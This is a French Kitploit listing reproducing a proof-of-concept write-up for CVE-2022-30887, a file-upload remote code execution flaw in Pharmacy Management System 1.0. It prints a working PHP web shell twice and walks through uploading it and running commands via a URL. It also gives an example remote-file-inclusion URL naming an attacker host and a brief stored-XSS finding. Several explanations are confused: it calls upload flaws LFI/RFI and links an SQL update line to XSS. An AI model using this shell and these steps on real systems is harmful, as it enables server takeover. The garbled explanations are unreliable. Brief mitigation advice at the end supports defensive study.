Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-30887 — Exploit de preuve de concept pour CVE-2022-30887, démontrant l'exécution de code à distance via le téléchargement de fichiers dans Pharmacy Management System 1.0, avec des conseils d'atténuation. | Kitploit
Outils/GitHubGitHub/sonerctnkya/cve-2022-30887
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubsonerctnkya/cve-2022-30887

CVE-2022-30887

Exploit de preuve de concept pour CVE-2022-30887, démontrant l'exécution de code à distance via le téléchargement de fichiers dans Pharmacy Management System 1.0, avec des conseils d'atténuation.

Voir le dépôt
245il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-30887

Pharmacy Management System 1.0 Téléchargement de shell

Cette application est développée par Mayurik Le projet de système de gestion de pharmacie en PHP a été développé pour améliorer la précision et l'efficacité des officines grâce à la sécurité et à la gestion. En bref, il s'agit d'une application d'inventaire de produits.

Il a été découvert que Pharmacy Management System v1.0 contient une vulnérabilité d'exécution de code à distance (RCE) via le composant "/php_action/editProductImage.php". Cette vulnérabilité permet aux attaquants d'exécuter du code arbitraire via un fichier image spécialement conçu.

Qu'est-ce qu'une attaque par inclusion de fichier ?

Les vulnérabilités de téléchargement de fichier sont généralement des vulnérabilités qui permettent à un script de s'exécuter. Elles se produisent lorsque nous téléchargeons le fichier sur le serveur et exécutons une commande sur le fichier téléchargé. Les vulnérabilités de téléchargement de fichier sont divisées en deux types ;

  • LFI (Local File Inclusion)
  • RFI (Remote File Inclusion)

LFI (Local File Inclusion)

Cette vulnérabilité se produit lorsque les fichiers locaux du serveur incluent le fichier récupéré auprès de l'utilisateur. Les valeurs reçues de l'utilisateur doivent être assainies.

Exemple de LFI (Local File Inclusion) ;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>

RFI (Remote File Inclusion)

Cette vulnérabilité fonctionne lorsque l'attaquant télécharge un logiciel malveillant depuis un serveur distant.

Exemple de RFI (Remote File Inclusion) ;

"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

Explication de l'exploit, PoC

  • Tout d'abord, après la page de connexion, nous serons dirigés vers "dashboar.php"
  • Deuxièmement, pour accéder à la page où la vulnérabilité a été trouvée, cliquez sur medicine dans le menu ; après avoir cliqué sur manage medicine, vous serez dirigé vers "product.php" et cliquez sur edit image sous l'onglet action

Produit

  • Sur la page "editproduct.php", cliquez sur le bouton select photo et téléversez votre script shell.

Exemple de script shell PHP ;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>
  • Cliquez sur le bouton save et interceptez la requête avec Burp Suite

Requête ;

Requête

Réponse ;

Réponse

  • Le fichier est téléchargé dans le dossier "/assets/myimage/"
  • Envoyez une requête pour exécuter votre script à l'URL suivante : /assets/myimage/shell.php?s=echo+%22MuallimNaci%22

Requête ;

Requête

Réponse ;

Réponse

Réponse

  • Et BOOM

De plus, cette vulnérabilité est toujours active sur l'application.

Atténuation

  • Assurez-vous de n'accepter que des caractères tels que "a-Z0-9" et de ne pas autoriser "..", "/" ou "%00" (octet nul)
  • Assurez-vous que le "flag allow_url_include" soit désactivé (off)
  • Selon la remédiation de l'OWASP Top 10 ; "L'application peut maintenir une *liste blanche de fichiers, qui peuvent être inclus par la page, puis utiliser un identifiant (par exemple le numéro d'index) pour accéder au fichier sélectionné. Toute requête contenant un identifiant invalide doit être rejetée ; de cette façon, il n'y a aucune surface d'attaque permettant aux utilisateurs malveillants de manipuler le chemin""

Bonus

Sur la même page "editproduct.php", j'ai trouvé une XSS stockée

  • Le code qui contient la vulnérabilité est ;
root@kitploit:~
$sql = "UPDATE product SET product_name = '$productName'

Dans ce bloc de code, vous pouvez sortir du contexte avec des guillemets doubles (")

Requête ;

Requête

Réponse ;

Réponse

Réponse

Conclusion

J'espère avoir pu expliquer comment fonctionne la vulnérabilité d'inclusion de fichier, quelle situation déclenche cette vulnérabilité et comment empêcher cette attaque de la part des attaquants. Merci pour votre précieux temps.

Télécharger l’outil